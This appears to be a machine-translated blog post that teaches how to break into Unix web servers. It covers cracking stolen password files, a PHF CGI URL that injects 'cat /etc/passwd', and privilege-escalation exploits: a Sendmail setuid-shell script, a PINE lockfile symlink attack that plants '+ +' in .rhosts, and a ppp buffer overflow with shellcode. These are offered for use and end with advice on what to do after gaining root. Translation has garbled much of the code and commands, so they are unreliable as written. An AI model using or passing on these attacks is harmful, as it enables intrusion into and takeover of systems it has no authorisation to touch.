Perhaps many of you already are a UNIX hacker (if gw newbie, but who sok tau), but for frequent hacking through the windows is worth a try. Methodology or terminology or anatomy or how short are:
<span class="fullpost">
1. Getting the password via FTP
2. PHF Technique
3. Telnet and Exploits
OK
Obtain Password
The easiest way to gain root access via ftp access into a webpage. First you must understand the contents of the password file.
root: User: d7Bdg: 1n2HG2: 1127:20: Superuser
AkedaBagus: p5Y (h0tiC: 1229:20: Akeda Good,: / usr / people / akedabagus: / bin / csh
MTong: EUyd5XAAtv2dA: 1129:20: altered Tong: / usr / people / mtong: / bin / csh
This is an example of an encrypted password file. The interesting part is:
root: x: 0:1: Superuser: /:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin: x: 203:102: ftp Administrator: / u1/ftp
Here is another example of the password file, it has a little difference, that is what is known shadowed. Yup this file was shadow. The file was shadow causes the files can not view or copy the encrypted password ever. Examples of the password file dishadow:
root: x :0:1:0000-Admin (0000 ):/:/ usr / bin / csh
daemon: x :1:1:0000-Admin (0000): /:
bin: x :2:2:0000-Admin (0000): / usr / bin:
sys: x :3:3:0000-Admin (0000): /:
adm: x :4:4:0000-Admin (0000): / var / adm:
lp: x :71:8:0000-lp (0000): / usr / spool / lp:
smtp: x: 0:0: mail daemon user: /:
uucp: x :5:5:0000-uucp (0000): / usr / lib / uucp:
nuucp: x :9:9:0000-uucp (0000): / var / spool / uucppublic: / usr / lib / uucp / uucico
listen: x: 37:4: Network Admin: / usr / net / nls:
nobody: x: 60001:60001: uid no body: /:
noaccess: x: 60002:60002: uid no access: /:
webmastr: x: 53:53: WWW Admin: / export / home / webmastr: / usr / bin / csh
pin4geo: x: 55:55: PinPaper Admin: / export/home/webmastr/new/gregY/test/pin4geo: / bin / false
ftp:x:54:54:Anonymous FTP: / export / home / anon_ftp: / bin / false
tershadow file has an "x" in place of password or sometimes they will be masked by *.
After knowing some password files, and hopefully can easily identify it. Now we go into ways to crack it.
Crack passwords are not as difficult as what we imagine, although different types of files from multiple systems. The first step is to download or copy the file. The next step to find a password cracker or a dictionary maker (customize the file types you can). Where nyarinya? Hmm ... get used to looking first to the search engines like google. Or it could be to astalavista, here are a search engine for nyari hacking tool. As a reference the author uses only cracker tools like: Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Then for a dictionary maker or a dictionary file ... When we (we ..? Lo wrote itself ) to start cracking a program, you will be asked to find the password file. That's where a dictionary maker. You can download the hacker sites are scattered. Dictionary maker can work in combination with alphabet letters that we can choose (ASCII, uppercase, lowercase and numbers). Then start cracking in accordance with instructions given from the tools page.
PHF Technique
Most people already know these techniques and most servers have already found this bug and fixed it. But there's nothing wrong include them as references.
Phf technique is the easiest (Sok tau gw newbie ... sorry ) get the password. To do this simply open the browser and and type:
http://nama_webpage/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd
Replace nama_webpage with the domain. So if you're trying to get files from www.akeda.com type password:
http://www.akeda.com/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd
Yeah Just so! Relax and copy the file (if still a way lo ... Yach ).
Telnet and Exploits
Actually this is the best way (I think) to hack webpages, but a bit harder than ftp or phf receipts. Before setting up the exploit, you must have telnetnya. Exploits tell the system if there are errors or bugs, and generally work to gain root access. There are so many types of exploits scattered on the internet.
Exploit is known as Sendmail v.8.8.4, this will create a suid program / tmp / x or a root shell. Mensetupnya ways:
cat <<_eof_> / tmp / x.c
# Define RUN "/ bin / ksh"
# Include <stdio.h>
main ()
{
execl (RUN, RUN, NULL);
}
_EOF_
#
cat <<_eof_> / tmp / spawnfish.c
main ()
{
execl ("/ usr / lib / sendmail", "/ tmp / smtpd", 0);
}
_EOF_
#
cat <<_eof_> / tmp / smtpd.c
main ()
{
setuid (0); setgid (0);
system ("chown root / tmp / x; chmod 4755 / tmp / x");
}
_EOF_
#
#
gcc-O-o / tmp / x / tmp / x.c
gcc-O3-o / tmp / spawnfish / tmp / spawnfish.c
gcc-O3-o / tmp / smtpd / tmp / smtpd.c
#
/ Tmp / spawnfish
kill-HUP `/ usr / UCB / ps-ax | grep / tmp / smtpd | grep-v grep | sed s /" []*"// | cut-d ""-f1 `
rm / tmp / spawnfish.c / tmp / spawnfish / tmp / smtpd.c / tmp / smtpd / tmp / xc
sleep 5
if [-u / tmp / x]; then
echo "Leet ..."
/ Tmp / x
fi
and now other exploits. I will explain the pine exploit through linux. By looking at the process table with ps to see which users are again running PINE, then ls / tmp / to obtain lockfile names for each user. See more process table, it will now appear every user who exit PINE or runs out of space message in inboxnya, would effectively remove any lockfile.
Make a link to / tmp / .hamors_lockfile to ~ hamors / .rhosts (generally this way) will cause PINE make ~ harmors / .rhosts as a 666 file with PINE process id in it. Or simpelnya echo "+ +"> / tmp / .hamors_lockfile, then rm / tmp / .hamors_lockfile.
* Here are excerpts from Sean B. Hamor ... In this example harmor as victims, while catluvr attacker.
hamors (21 19:04) litterbox: ~> pine
catluvr (6 19:06) litterbox: ~> ps-aux | grep pine
catluvr 1739 0.0 1.8 100 356 PP3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 PP2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox: ~> ls-al / tmp / | grep hamors
--Rw-rw-rw-1 hamors elite 4 Aug 26 19:05 .302. F5a4
catluvr (8 19:07) litterbox: ~> ps-aux | grep pine
catluvr 1744 0.0 1.8 100 356 PP3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox: ~> ln-s / home / hamors / .rhosts / tmp/.302.f5a4
hamors (23 19:09) litterbox: ~> pine
catluvr (11 19:10) litterbox: ~> ps-aux | grep pine
catluvr 1759 0.0 1.8 100 356 PP3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 PP2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox: ~> echo "+ +"> / tmp/.302.f5a4
catluvr (13 19:12) litterbox: ~> cat / tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox: ~> rm / tmp/.302.f5a4
catluvr (15 19:14) litterbox: ~> rlogin-l litterbox.org hamors
The last one I kasihtau is the script for the ppp yng exploit vulner. Confuse with the numbers if it was unable to work. Mensetupnya this way:
# Include <stdio.h>
# Include <stdlib.h>
# Include <unistd.h>
# Define BUFFER_SIZE 156 / * size of the buffer to overflow * /
# Define OFFSET -290 / * number of bytes to jump after the start
of the buffer * /
Long get_esp (void) {__asm__ ("movl% esp,% eax \ n");}
main (int argc, char * argv [])
{
char * buf = NULL;
unsigned long * addr_ptr = NULL;
char * ptr = NULL;
execshell char [] =
"\ Xeb \ X23 \ x5e \ x8d \ x1e \ x89 \ x5e \ x0b \ x31 \ xd2 \ x89 \ x56 \ x07 \ x89 \ x56 \ x0f" / * 16 bytes * /
"\ X89 \ x56 \ x 14 \ x88 \ x56 \ x19 \ x31 \ xc0 \ xb0 \ x3b \ x8d \ x4e \ x0b \ x89 \ xca \ x52" / * 16 bytes * /
"\ X51 \ x53 \ x50 \ xeb \ x18 \ xe8 \ xd8 \ xFF \ xFF \ xFF / bin / sh \ x01 \ x01 \ x01 \ x01" / * 20 bytes * /
"\ X02 \ x02 \ x02 \ x02 \ x03 \ x03 \ x03 \ x03 \ x9a \ x04 \ x04 \ x04 \ x04 \ x07 \ x04" / * 15 bytes, 57 total * /
int i, j;
buf = malloc (4096);
/ * Fill start of buffer with nops * /
i = BUFFER_SIZE-strlen (execshell);
memset (buf, 0x90, i);
ptr = buf + i;
/ * Place exploit code into the buffer * /
for (i = 0; i <strlen (execshell); i + +)
* Ptr + + = execshell [i];
addr_ptr = (long *) ptr;
for (i = 0; i <(104 / 4); i + +)
* Addr_ptr get_esp + + = () + OFFSET;
ptr = (char *) addr_ptr;
* Ptr = 0;
setenv ("HOME", buf, 1);
execl ("/ usr / sbin / ppp", "ppp", NULL);
}
After obtaining root access, you should lo change the password before deleting or changing something. To change their account login via telnet to your new account. Type in passwd, then will ask you a new password that will change. </span>
0 comments:
Post a Comment